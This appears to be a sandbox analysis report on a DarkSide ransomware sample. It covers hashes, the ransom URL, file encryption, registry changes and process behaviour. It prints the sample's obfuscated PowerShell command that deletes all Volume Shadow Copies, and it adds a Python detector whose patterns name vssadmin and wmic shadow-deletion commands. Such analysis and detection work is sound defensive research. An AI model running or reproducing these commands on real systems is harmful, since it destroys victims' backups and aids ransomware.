Analysis

- max time kernel: 37s
- max time network: 81s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 04-08-2021 18:10
Static task: static1

Behavioral task: behavioral1
- Sample: PurchaseOrderPoster.bin.exe
- Resource: win7v20210408

Behavioral task: behavioral2
- Sample: PurchaseOrderPoster.bin.exe
- Resource: win10v20210408
General

- Target: PurchaseOrderPoster.bin.exe
- Size: 30KB
- MD5: f00aded4c16c0e8c3b5adfc23d19c609
- SHA1: 86ca4973a98072c32db97c9433c16d405e4154ac
- SHA256: 4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
- SHA512: a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
Malware Config

Extracted from: C:\README.f2cbf9aa.TXT (the dropped ransom note)
- Family: darkside
- URL: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

Modifies extensions of user files (18 IoCs)
Ransomware generally changes the extension on encrypted files. Here every encrypted file gets the victim-specific suffix .f2cbf9aa, the same ID used in the ransom note name, wallpaper, icon and registry class below.
Process: PurchaseOrderPoster.bin.exe
- File opened for modification: C:\Users\Admin\Pictures\ExpandCopy.tiff
- File opened for modification: C:\Users\Admin\Pictures\GetRestart.png.f2cbf9aa
- File opened for modification: C:\Users\Admin\Pictures\RestoreResize.png.f2cbf9aa
- File renamed: C:\Users\Admin\Pictures\HideWrite.crw => C:\Users\Admin\Pictures\HideWrite.crw.f2cbf9aa
- File opened for modification: C:\Users\Admin\Pictures\HideWrite.crw.f2cbf9aa
- File opened for modification: C:\Users\Admin\Pictures\UndoDebug.crw.f2cbf9aa
- File renamed: C:\Users\Admin\Pictures\SelectUnblock.raw => C:\Users\Admin\Pictures\SelectUnblock.raw.f2cbf9aa
- File opened for modification: C:\Users\Admin\Pictures\SelectUnblock.raw.f2cbf9aa
- File opened for modification: C:\Users\Admin\Pictures\StopMeasure.tiff
- File renamed: C:\Users\Admin\Pictures\ExpandCopy.tiff => C:\Users\Admin\Pictures\ExpandCopy.tiff.f2cbf9aa
- File opened for modification: C:\Users\Admin\Pictures\ExpandCopy.tiff.f2cbf9aa
- File renamed: C:\Users\Admin\Pictures\GetRestart.png => C:\Users\Admin\Pictures\GetRestart.png.f2cbf9aa
- File renamed: C:\Users\Admin\Pictures\RestoreResize.png => C:\Users\Admin\Pictures\RestoreResize.png.f2cbf9aa
- File renamed: C:\Users\Admin\Pictures\UndoDebug.crw => C:\Users\Admin\Pictures\UndoDebug.crw.f2cbf9aa
- File renamed: C:\Users\Admin\Pictures\AssertSplit.raw => C:\Users\Admin\Pictures\AssertSplit.raw.f2cbf9aa
- File opened for modification: C:\Users\Admin\Pictures\AssertSplit.raw.f2cbf9aa
- File renamed: C:\Users\Admin\Pictures\StopMeasure.tiff => C:\Users\Admin\Pictures\StopMeasure.tiff.f2cbf9aa
- File opened for modification: C:\Users\Admin\Pictures\StopMeasure.tiff.f2cbf9aa
Reads user/profile data of web browsers (2 TTPs; no file IoCs recorded for this signature)
Infostealers often target stored browser data, which can include saved credentials etc.
Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
Process: PurchaseOrderPoster.bin.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallPaper = "C:\ProgramData\f2cbf9aa.BMP"
- Set value (str): \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\ProgramData\f2cbf9aa.BMP"

Modifies Control Panel (1 IoC)
Process: PurchaseOrderPoster.bin.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallpaperStyle = "10"

Modifies registry class (5 IoCs)
Registers the new .f2cbf9aa extension and gives it a custom icon so encrypted files are visibly marked in Explorer.
Process: PurchaseOrderPoster.bin.exe
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon\ = "C:\Users\Admin\AppData\Local\f2cbf9aa.ico"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa\ = "f2cbf9aa"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes: powershell.exe, PurchaseOrderPoster.bin.exe
- PID 916 powershell.exe (2 events)
- PID 1696 PurchaseOrderPoster.bin.exe (2 events)

Suspicious use of AdjustPrivilegeToken (24 IoCs)
Processes: PurchaseOrderPoster.bin.exe, powershell.exe, vssvc.exe
- PID 1696 PurchaseOrderPoster.bin.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, LUID 33, LUID 34, LUID 35 (the last three are privilege LUIDs the sandbox did not resolve to names; on Windows 7 they are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege). The list runs through the token's privileges in LUID order, which is what a loop that enables every privilege the token holds looks like, rather than a request for specific ones.
- PID 916 powershell.exe: SeDebugPrivilege
- PID 936 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege

Suspicious use of WriteProcessMemory (4 IoCs)
Process: PurchaseOrderPoster.bin.exe
- PID 1696 PurchaseOrderPoster.bin.exe wrote to memory of PID 916 powershell.exe (4 events)
Processes

C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe (PID 1696)
Command line: "C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

    Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 916, spawned by PID 1696)
    Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
    The loop rebuilds a string one hex byte at a time and passes it to iex; the literal decodes to Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} (the loop reads 62 of the 63 encoded bytes, dropping a trailing space). That deletes every Volume Shadow Copy through WMI, which is why vssvc.exe appears below holding SeBackupPrivilege and SeRestorePrivilege. -ep bypass sets the execution policy to Bypass for this invocation only.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 936)
Command line: C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
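The PowerShell child in the process tree above builds its real command at runtime from a hex literal and hands it to iex, so a command-line match on "Win32_Shadowcopy" or "vssadmin" never fires on the raw event. The following Python is an added example, not part of this sandbox report or of the sample: it reconstructs the plaintext exactly the way the loop does, (0..N) consuming N+1 byte pairs from the literal, and then runs a small shadow-copy-deletion indicator set over the result. The command line is the one recorded for PID 916 above; the regex set, the function names and the "loader shape" pattern are my own assumptions, not the sandbox's signatures.

```python
"""Decode the hex-stuffed PowerShell one-liner from the process tree and
flag Volume Shadow Copy deletion.  Added example; not part of the report."""
import re
from typing import Optional

# Command line exactly as recorded for PID 916 in the process tree (page data).
SAMPLE_CMDLINE = (
    "powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+"
    "'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
    "466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'"
    ".Substring(2*$_,2))};iex $s\""
)

# Loader shape: (0..N)|%{$s+=[char][byte]('0x'+'<hex>'.Substring(2*$_,2))}
# Variable name and whitespace are allowed to vary (assumed generalisation).
_HEX_LOOP = re.compile(
    r"\(0\.\.(?P<n>\d+)\)\s*\|\s*%\s*\{\s*\$\w+\s*\+=\s*\[char\]\[byte\]\("
    r"'0x'\s*\+\s*'(?P<hex>[0-9A-Fa-f]+)'\s*\.Substring\(2\*\$_,\s*2\)\)\s*\}",
    re.IGNORECASE,
)

# Indicators of shadow-copy deletion in a (decoded) command line.
# Assumed, illustrative rule set, not the sandbox's own signature logic.
_SHADOW_DELETE = [
    re.compile(r"Win32_Shadowcopy.*\.Delete\(\)", re.IGNORECASE),
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.IGNORECASE),
]


def decode_hex_loop(cmdline: str) -> Optional[str]:
    """Return the plaintext the PowerShell loop would hand to iex, or None
    if the command line does not use this loader shape."""
    m = _HEX_LOOP.search(cmdline)
    if m is None:
        return None
    count = int(m.group("n")) + 1          # (0..N) runs N+1 iterations
    hexstr = m.group("hex")
    # Iteration i reads the pair at offset 2*i, so only the first `count`
    # bytes are decoded; anything beyond that in the literal never executes.
    used = hexstr[: 2 * count]
    used = used[: len(used) - len(used) % 2]  # guard against odd-length input
    return bytes.fromhex(used).decode("latin-1")


def deletes_shadow_copies(cmdline: str) -> bool:
    """True if the command line, after decoding the hex loader if present,
    matches a shadow-copy deletion indicator."""
    text = decode_hex_loop(cmdline) or cmdline
    return any(p.search(text) for p in _SHADOW_DELETE)


if __name__ == "__main__":
    print(decode_hex_loop(SAMPLE_CMDLINE))
    print("shadow-copy deletion:", deletes_shadow_copies(SAMPLE_CMDLINE))
```

Decoding exactly the bytes the loop consumes matters: the literal here carries 63 bytes but the loop reads 62, so a naive full-length hex decode yields a different string (a trailing space) and any exact-match or hash-based lookup on the decoded text would miss. The indicator set deliberately covers the WMI, vssadmin and wmic variants so the same function serves other samples that reach the same goal by a different command.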
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
- MD5: 33e42934d49a01d00c2f656779ab39d0
- SHA1: b0948a8ae1ea8366fd8f937b312261bc07dfaa93
- SHA256: b0666e4e1732399e09d1e053de280ace5426e52eb5b212d023e6e7999a7ec542
- SHA512: 90fe2726a2e9d8a721e698343c83c2d5b03be65fda52506d14a530bb1d8a03a2415dbee22dd96d35e4e0045a4bd360dee97354ef47de9e5d7ab5db1a1c1a8771

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
- MD5: 412607a2f0f0a4a33ae00c4f5e887ce0
- SHA1: 67cb09380ea4efd2c819ba95e3acc13a3bd96e16
- SHA256: 398901c2bc541fea59b18686b97154e5fea02d3f2ce32ca9a494239c250ffa8c
- SHA512: dbddcb177a2c50a80409481f44b949b4f970726994cd2feef067da5606799ce89dd64f186a98355104b0c2066823c1960d965c01231f83dc3d46266c39b9ec69

Memory dumps (filesize)
- memory/916-65-0x00000000025E0000-0x00000000025E1000-memory.dmp: 4KB
- memory/916-62-0x0000000002350000-0x0000000002351000-memory.dmp: 4KB
- memory/916-63-0x000000001AD00000-0x000000001AD01000-memory.dmp: 4KB
- memory/916-64-0x0000000002430000-0x0000000002431000-memory.dmp: 4KB
- memory/916-66-0x000000001AC80000-0x000000001AC82000-memory.dmp: 8KB
- memory/916-67-0x000000001AC84000-0x000000001AC86000-memory.dmp: 8KB
- memory/916-68-0x000000001C4D0000-0x000000001C4D1000-memory.dmp: 4KB
- memory/916-69-0x000000001C5A0000-0x000000001C5A1000-memory.dmp: 4KB
- memory/916-61-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp: 8KB
- memory/916-60-0x0000000000000000-mapping.dmp
- memory/1696-59-0x0000000075211000-0x0000000075213000-memory.dmp: 8KB